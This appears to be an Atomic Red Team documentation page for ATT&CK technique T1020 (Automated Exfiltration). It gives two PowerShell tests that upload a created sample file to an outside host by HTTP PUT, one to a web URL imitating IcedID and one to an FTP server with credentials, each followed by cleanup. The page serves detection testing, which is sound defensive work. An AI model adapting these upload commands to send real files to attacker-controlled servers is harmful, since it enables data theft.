T1020 - Automated Exfiltration
Description from ATT&CK (opens in a new tab)
Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel (opens in a new tab) and Exfiltration Over Alternative Protocol (opens in a new tab).
Atomic Tests
Atomic Test #1 - IcedID Botnet HTTP PUT
Creates a text file Tries to upload to a server via HTTP PUT method with ContentType Header Deletes a created file
Supported Platforms: Windows
auto_generated_guid: 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| file | Exfiltration File | string | C:\temp\T1020_exfilFile.txt |
| domain | Destination Domain | url | https://google.com (opens in a new tab) |
Attack Commands: Run with powershell!
$fileName = "#{file}"
$url = "#{domain}"
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}Cleanup Commands:
$fileName = "#{file}"
Remove-Item -Path $fileName -ErrorAction IgnoreAtomic Test #2 - Exfiltration via Encrypted FTP
Simulates encrypted file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server (opens in a new tab), providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.
Supported Platforms: Windows
auto_generated_guid: 5b380e96-b0ef-4072-8a8e-f194cb9eb9ac
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| sampleFile | Path of the sample file to exfiltrate. | String | C:\temp\T1020__FTP_sample.txt |
| ftpServer | FTP server URL. | Url | ftp://example.com |
| credentials | FTP server credentials. | String | [user:password] |
Attack Commands: Run with powershell!
$sampleData = "Sample data for exfiltration test"
Set-Content -Path "#{sampleFile}" -Value $sampleData
$ftpUrl = "#{ftpServer}"
$creds = Get-Credential -Credential "#{credentials}"
Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $credsCleanup Commands:
Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore